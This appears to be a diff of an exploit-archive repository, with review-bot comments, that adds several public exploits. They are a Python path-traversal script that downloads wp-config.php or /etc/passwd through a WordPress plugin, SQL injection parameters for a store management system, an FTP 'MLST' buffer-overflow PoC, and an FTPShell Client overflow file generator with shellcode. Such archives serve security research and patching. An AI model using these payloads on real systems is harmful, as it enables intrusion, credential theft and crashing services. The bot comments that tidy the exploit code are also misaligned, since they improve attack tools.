print "---------------------------------------------------------------------"
|
||||||
|
victim = raw_input("Please Enter victim host e.g. http://example.com: ")
|
||||||
|
file_choice=raw_input ("\n Please choose a number representing the file to attack: \n1. Wordpress Config \n2. Linux Passwd File\n")
|
||||||
|
if file_choice == "1":
|
||||||
|
payload="..././..././..././wp-config.php"
|
||||||
|
elif file_choice == "2":
|
||||||
|
payload="..././..././..././..././..././..././..././..././etc/passwd"
|
||||||
|
else:
|
||||||
|
print "Invalid Download choice, Please choose 1 or 2; Alternatively you can re-code me toI will now exit"
|
||||||
|
quit()
|
||||||
|
slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file="+payload
|
||||||
|
target=victim+slug
|
||||||
|
def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits):
|
||||||
|
return ''.join(random.choice(chars) for _ in range(size))
|
||||||
|
|
||||||
|
def checkPlugin():
|
||||||
|
pluginExists = requests.get(victim+"/wp-content/plugins/membership-simplified-for-oap-members-only/download.php")
|
||||||
|
pluginExistence = pluginExists.status_code
|
||||||
|
if pluginExistence == 200:
|
||||||
|
print "\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."
|
||||||
|
exploit()
|
||||||
|
else:
|
||||||
|
print "Target has a funny code & might not be vulnerable, I will now exit\n"
|
||||||
|
quit()
|
||||||
|
|
||||||
|
def exploit():
|
||||||
|
|
||||||
|
getThatFile = requests.get(target)
|
||||||
|
fileState = getThatFile.status_code
|
||||||
|
breakApart=urlparse(victim)
|
||||||
|
extract_hostname=breakApart.netloc
|
||||||
|
randomDifferentiator=randomizeFile()
|
||||||
|
cleanName=str(randomDifferentiator)
|
||||||
|
if fileState == 200:
|
||||||
|
respFromThatFile = getThatFile.text
|
||||||
|
if file_choice == "1":
|
||||||
|
resultFile=extract_hostname+"_config_"+cleanName+".txt"
|
||||||
|
print resultFile
|
||||||
|
pwned=open(resultFile, 'w')
|
||||||
|
pwned.write(respFromThatFile)
|
||||||
|
pwned.close
|
||||||
|
print "Wordpress Config Written to "+resultFile
|
||||||
|
else:
|
||||||
|
resultFile=extract_hostname+"_passwd"+cleanName+".txt"
|
||||||
|
pwned=open(resultFile, 'w')
|
||||||
|
pwned.write(respFromThatFile)
|
||||||
|
pwned.close
|
||||||
|
print "Passwd File Written to "+resultFile
|
||||||
|
else:
|
||||||
|
print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: \n" +fileState
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
checkPlugin()
|
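Review bot: `pwned.close` after each `pwned.write(respFromThatFile)` (both the config and the passwd branch) is an attribute lookup, not a call, so the file handle is left to garbage collection instead of being closed explicitly; `with open(resultFile, 'w') as pwned: pwned.write(respFromThatFile)` removes the problem in both places. In the failure branch, `print "... The server responded with: \n" +fileState` concatenates a `str` with the `int` status code and raises `TypeError`, so the intended message is never shown; wrap it as `str(fileState)`. The two result names are also built inconsistently (`"_config_"` versus `"_passwd"` with no trailing underscore), and `exploit()` and `checkPlugin()` silently depend on the module-level `target`, `victim` and `file_choice`, which deserves a one-line comment above `def exploit():`.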
29
platforms/php/webapps/41627.txt
Executable file
|
@ -0,0 +1,29 @@
|
||||||
|
# # # # #
|
||||||
|
# Exploit Title: Pasal - Departmental Store Management System v1.2 - SQL Injection
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 17.03.2017
|
||||||
|
# Vendor Homepage: http://webstarslab.com
|
||||||
|
# Software : http://webstarslab.com/products/pasal-departmental-store-management-system/
|
||||||
|
# Demo: http://webstarslab.com/departmental-store-management-system/store/
|
||||||
|
# Version: 1.2
|
||||||
|
# Tested on: Win7 x64, Kali Linux x64
|
||||||
|
# # # # #
|
||||||
|
# Exploit Author: Ihsan Sencan
|
||||||
|
# Author Web: http://ihsan.net
|
||||||
|
# Author Mail : ihsan[@]ihsan[.]net
|
||||||
|
# # # # #
|
||||||
|
# SQL Injection/Exploit :
|
||||||
|
# Login as regular user
|
||||||
|
# http://localhost/[PATH]/module.php?module=vendors&page=edit-vendors&id=[SQL]
|
||||||
|
# http://localhost/[PATH]/module.php?module=units&page=edit-units&id=[SQL]
|
||||||
|
# http://localhost/[PATH]/module.php?module=currency&page=edit-currency&id=[SQL]
|
||||||
|
# http://localhost/[PATH]/module.php?module=category&page=edit-category&id=[SQL]
|
||||||
|
# http://localhost/[PATH]/module.php?module=purchase&y=[SQL]&m=[SQL]
|
||||||
|
# tbl_users:id
|
||||||
|
# tbl_users:username
|
||||||
|
# tbl_users:password
|
||||||
|
# tbl_users:email
|
||||||
|
# tbl_users:full_name
|
||||||
|
# tbl_users:permission
|
||||||
|
# Etc..
|
||||||
|
# # # # #
|
50
platforms/windows/dos/41620.txt
Executable file
|
@ -0,0 +1,50 @@
|
||||||
|
[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
|
||||||
|
[+] Credits / Discovery: Nassim Asrir
|
||||||
|
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
|
||||||
|
[+] Author Company: Henceforth
|
||||||
|
[+] CVE: CVE-2017-6880
|
||||||
|
|
||||||
|
Vendor:
|
||||||
|
===============
|
||||||
|
|
||||||
|
https://www.cerberusftp.com/
|
||||||
|
|
||||||
|
|
||||||
|
Download:
|
||||||
|
===========
|
||||||
|
|
||||||
|
https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Type:
|
||||||
|
===================
|
||||||
|
|
||||||
|
Remote Buffer Overflow.
|
||||||
|
|
||||||
|
|
||||||
|
issue:
|
||||||
|
===================
|
||||||
|
|
||||||
|
This problem happens when the Attacker send the bad char "A" in the command "MLST" (2047).
|
||||||
|
|
||||||
|
POC:
|
||||||
|
===================
|
||||||
|
#Simple POC by Nassim Asrir from Henceforth.
|
||||||
|
import socket
|
||||||
|
bad_char = "A"*2047
|
||||||
|
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||||
|
connect=s.connect(('192.168.1.81',21))
|
||||||
|
s.recv(1024)
|
||||||
|
s.send('USER nassim\r\n')
|
||||||
|
s.recv(1024)
|
||||||
|
s.send('PASS mypass\r\n')
|
||||||
|
s.recv(1024)
|
||||||
|
s.send('MLST ' + bad_char + '\r\n')
|
||||||
|
s.close()
|
||||||
|
|
||||||
|
https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
|
||||||
|
|
||||||
|
Tested on:
|
||||||
|
===============
|
||||||
|
|
||||||
|
Windows 7 Sp1 (64 Bit)
|
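Review bot: The PoC authenticates with `USER nassim` / `PASS mypass` before sending the oversized `MLST`, yet the `issue:` section never says whether valid credentials are required, which is the first thing a defender needs to judge exposure; add a sentence such as `The crash is triggered after a successful login; anonymous access was [tested/not tested].` `connect=s.connect(('192.168.1.81',21))` binds `None`, since `socket.connect` returns nothing, and the hard-coded address and credentials should be marked as placeholders to be replaced. The title says "Remote Buffer Overflow" while the files.csv entry for 41620 classifies it as `dos`; stating that the PoC only crashes the service would reconcile the two.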
49
platforms/windows/dos/41629.py
Executable file
|
@ -0,0 +1,49 @@
|
||||||
|
print '''
|
||||||
|
|
||||||
|
##############################################
|
||||||
|
# Created: ScrR1pTK1dd13 #
|
||||||
|
# Name: Greg Priest #
|
||||||
|
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
|
||||||
|
##############################################
|
||||||
|
|
||||||
|
# Exploit Title: FTPShell Client 6.53 Session name BufferOverflow
|
||||||
|
# Date: 2017.03.17
|
||||||
|
# Exploit Author: Greg Priest
|
||||||
|
# Version: FTPShell Client 6.53
|
||||||
|
# Tested on: Windows7 x64 HUN/ENG Professional
|
||||||
|
'''
|
||||||
|
|
||||||
|
|
||||||
|
a = "A" * 460
|
||||||
|
b = '\xDC\xE8\x65\x76'
|
||||||
|
nop = '\x90' * 10
|
||||||
|
c = "C" * 1638
|
||||||
|
|
||||||
|
#calc.exe
|
||||||
|
shellcode =(
|
||||||
|
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
|
||||||
|
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
|
||||||
|
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
|
||||||
|
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
|
||||||
|
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
|
||||||
|
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
|
||||||
|
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
|
||||||
|
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
|
||||||
|
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
|
||||||
|
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
|
||||||
|
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
|
||||||
|
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
|
||||||
|
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
|
||||||
|
"\x53\x53\x53\x53\x52\x53\xff\xd7")
|
||||||
|
|
||||||
|
evilstring = a+b+nop+shellcode+c
|
||||||
|
|
||||||
|
|
||||||
|
file = open ('evilstring.txt', "w")
|
||||||
|
file.write(evilstring)
|
||||||
|
file.close
|
||||||
|
|
||||||
|
print evilstring
|
||||||
|
|
||||||
|
|
||||||
|
|
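Review bot: `file.close` is an attribute reference, not a call, so the handle opened by `file = open ('evilstring.txt', "w")` is only released by garbage collection, and `file` shadows the Python 2 builtin of the same name; `with open('evilstring.txt', 'w') as out: out.write(evilstring)` fixes both. The constants `a = "A" * 460`, `b = '\xDC\xE8\x65\x76'` and `c = "C" * 1638` carry no comments, so `#calc.exe` above the shellcode is the only explanation in the file; a one-line comment on each stating what the value is and how it was derived (or `# not documented` where it is unknown) is what makes a PoC reviewable.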